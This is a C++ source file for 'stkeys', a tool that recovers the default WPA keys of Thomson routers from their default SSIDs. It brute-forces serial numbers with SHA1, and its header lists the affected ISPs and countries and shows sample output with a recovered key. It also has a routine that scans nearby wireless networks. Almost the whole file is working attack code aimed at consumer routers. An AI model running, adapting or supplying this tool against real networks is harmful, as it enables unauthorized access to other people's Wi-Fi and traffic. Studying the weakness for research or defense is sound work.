/*
 * Created: 01/22/10-20:41:49
 * Author: Ted

        stkeys v0.2 - Recover default WPA key for Thomson routers using default SSID

        Recovery possible for certain thomson routers supplied by following ISP / country

                 Orange           - Spain
                 KPN              - Netherlands
                 Telenor          - Norway
                 Bouygues Telecom - France
                 Elion            - Estonia
                 BigPond          - Australia
                 BT               - UK

        There are probably more but these seem to be main suppliers..
        
        Code only generates keys between 2004 and 2009..if Thomson are still shipping
        routers with same algorithm after 2009, i don't want to say..since it was first
        brought to their attention in april 2008.

        compile: g++ -s stkeys.cpp -ostkeys
        example:
        
        # stkeys 3983bc

    
        [*] Generating keys for 2004
    
        [*] Generating keys for 2005
    
        [*] Generating keys for 2006
    
        [*] Generating keys for 2007
    
        [*] Generating keys for 2008
                [+] Serial Number: CP0827**HHJ - potential key = B6D27F2D2F
    
        [*] Generating keys for 2009
    
        [*] Seconds elapsed:6 - keys per second:2426112

        
        April 2008 - wyse101 0x40 gmail.com
 */
//#include <cstdio>
//#include <cstdlib>
//#include <cstring>
#include <string>
//#include <cctype>
//#include <ctime>
#include "shacalculator.h"

unsigned long ssid;

sha1_key week_buffer;
sha1_key year_buffer;

unsigned long long iterations = 0;

ShaCalculator sha;

void gen_serials(void)
{
    sha = ShaCalculator();

    unsigned char serial[8]={0};

    //unsigned char status[4]={'|','/','-','\\'};

    serial[0] = 'C';
    serial[1] = 'P';
    serial[2] = '0';
    printf("\\");
    for(int year = 0; year <= 5; year++) {
                
        printf("\b[*] Generating keys for 200%d\n",year+4);
        memcpy(&year_buffer,&sha.yy_schedules[year],sizeof(sha1_key));
                
        for(int week = 0; week < 52; week++) {
            
            SHA1_SET_KEY(week_buffer,year_buffer,sha.ww_schedules[week]);
                        
            for(int x1 = 0; x1 < 36; x1++) {

                SHA1_SET_KEY(sha.x1_buffer,week_buffer,sha.x1_schedules[x1]);

                for(int x2 = 0; x2 < 36; x2++) {

                    SHA1_SET_KEY(sha.x2_buffer,sha.x1_buffer,sha.x2_schedules[x2]);

                    for(int x3 = 0; x3 < 36; x3++) {

                        SHA1_SET_KEY(sha.x3_buffer,sha.x2_buffer,sha.x3_schedules[x3]);

                        sha.sha1_block();
                                                
                        if( (sha.sha1_hash[4] & 0x00FFFFFF) == ssid) {

                            serial[3] = (year  + 4 ) + '0';
                            serial[4] = ((week + 1)  / 10) + '0';
                            serial[5] = ((week + 1)  % 10) + '0';

                            printf("\b\t[+] Serial Number: %s**%c%c%c - potential key = %08lX%02X\n",
                                serial,charTable[x1],charTable[x2],charTable[x3],
                                sha.sha1_hash[0],((unsigned char*)&sha.sha1_hash)[7]);
							fflush(stdout);
                        }
                        iterations++;
                    }
                }
            }
        }
    }
}

void print_networks()
{
	FILE *fpipe;
    char command[]="/sbin/iwlist wlan0 scanning|grep ESSID:";
	char line[256];
    int counter = 0;

	if ( !(fpipe = (FILE*)popen(command,"r")) )
	{  // If fpipe is NULL
		perror("Problems with pipe");
		exit(1);
	}
    printf("\n\tWireless networks:\n");
	while ( fgets( line, sizeof line, fpipe))
	{
		printf("\t%d) %s",counter++, line+26);
	}
	pclose(fpipe);
}

int main(int argc, char *argv[])
{
    unsigned long keys,seconds;
    time_t start_time;
    size_t ssidLen;
    
    if(argc != 2) { 
        puts("\n\t" 
             "STkeys - default WPA key recovery for Thomson routers"
             "\n\t(x) June 2008 - wyse101 0x40 gmail.com"
			 "\n\t(x) January 2010 - GetAway compiled for Maemo"); 
            
        printf("\n\tUsage: stkeys <Default Thomson SSID>\n");

        //print_networks();

        //int n;
        //scanf ("%d",&n);

        return 0; 
    } 
        
    if((ssidLen = strlen(argv[1])) != 6) {
        printf("Invalid SSID length: %s\n",argv[1]);
        return 0;
    }
        
    for(size_t i = 0;i < ssidLen;i++) {
        if(!isxdigit(argv[1][i])) { 
            printf("\tNot a valid SSID: \"%s\"\n",argv[1]); 
            return 0; 
        } 
    }
    
    sscanf(argv[1],"%lx",&ssid);

    start_time = time(0);
    gen_serials();
    seconds = (time(0) - start_time);
    keys = (seconds > 0) ? (iterations / seconds) : iterations;
        
    printf("\n[*] Seconds elapsed:%lu - keys per second:%lu\n",seconds,keys);
    return 0;
}
